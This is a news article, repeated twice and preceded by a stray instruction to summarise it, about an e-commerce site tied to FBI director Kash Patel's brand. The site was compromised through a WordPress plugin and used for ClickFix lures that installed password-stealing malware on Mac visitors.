FBI director’s personal website hacked and loaded with malware
FBI director’s personal website hacked and loaded with malware
Publish Date: 2026-05-26 01:15:00
Source Domain: www.escudodigital.com
Using an unordered list, summarize the following article with between 4 and 8 key points.
An e-commerce website related to products from the FBI director’s brand, Kash Patel, has been taken down after it was detected that it had been compromised by attackers and used to distribute malware to visitors.
The incident has been attributed to a campaign employing a social engineering technique known as ‘ClickFix’, where victims are tricked into executing the malicious code themselves.
The hackers managed to place a message that mimicked a legitimate security verification. Users were asked to copy a code and paste it into their computer terminal. But by doing so, the command downloaded and installed malware on the device, particularly on Mac computers.
That screen made the user think they were solving an access issue or verifying they were not a bot, but in reality, it was leading them to manually execute a dangerous command in their terminal.
Once executed, the malicious tool could steal passwords stored in the browser, access system information, and send sensitive data to external servers, including in some cases credentials and possible cryptocurrency wallets. Afterwards, the program attempted to remove traces of its activity to make detection more difficult.
Once again due to a WordPress plugin
Investigations have pointed out that the website was compromised on several levels. On one hand, a plugin had been used to steal users’ payment data. On the other hand, the page itself served as a vehicle to redirect users towards malware downloads.
The affected website was a store based on WordPress (with the WooCommerce plugin). This type of platform is very popular and, precisely for that reason, also a frequent target. The attackers not only compromised the visible part of the store but also some internal component, like a poorly maintained extension. From there, they managed to introduce the malicious code.
At this moment, Patel’s page remains inactive. Upon entering, a message indicates they will return soon. “We are making improvements to offer you a better service. The store will be back online shortly, more powerful than ever,” reads the text.
An e-commerce website related to products from the FBI director’s brand, Kash Patel, has been taken down after it was detected that it had been compromised by attackers and used to distribute malware to visitors.
The incident has been attributed to a campaign employing a social engineering technique known as ‘ClickFix’, where victims are tricked into executing the malicious code themselves.
The hackers managed to place a message that mimicked a legitimate security verification. Users were asked to copy a code and paste it into their computer terminal. But by doing so, the command downloaded and installed malware on the device, particularly on Mac computers.
That screen made the user think they were solving an access issue or verifying they were not a bot, but in reality, it was leading them to manually execute a dangerous command in their terminal.
Once executed, the malicious tool could steal passwords stored in the browser, access system information, and send sensitive data to external servers, including in some cases credentials and possible cryptocurrency wallets. Afterwards, the program attempted to remove traces of its activity to make detection more difficult.
Once again due to a WordPress plugin
Investigations have pointed out that the website was compromised on several levels. On one hand, a plugin had been used to steal users’ payment data. On the other hand, the page itself served as a vehicle to redirect users towards malware downloads.
The affected website was a store based on WordPress (with the WooCommerce plugin). This type of platform is very popular and, precisely for that reason, also a frequent target. The attackers not only compromised the visible part of the store but also some internal component, like a poorly maintained extension. From there, they managed to introduce the malicious code.
At this moment, Patel’s page remains inactive. Upon entering, a message indicates they will return soon. “We are making improvements to offer you a better service. The store will be back online shortly, more powerful than ever,” reads the text.
Become a premium member for free!
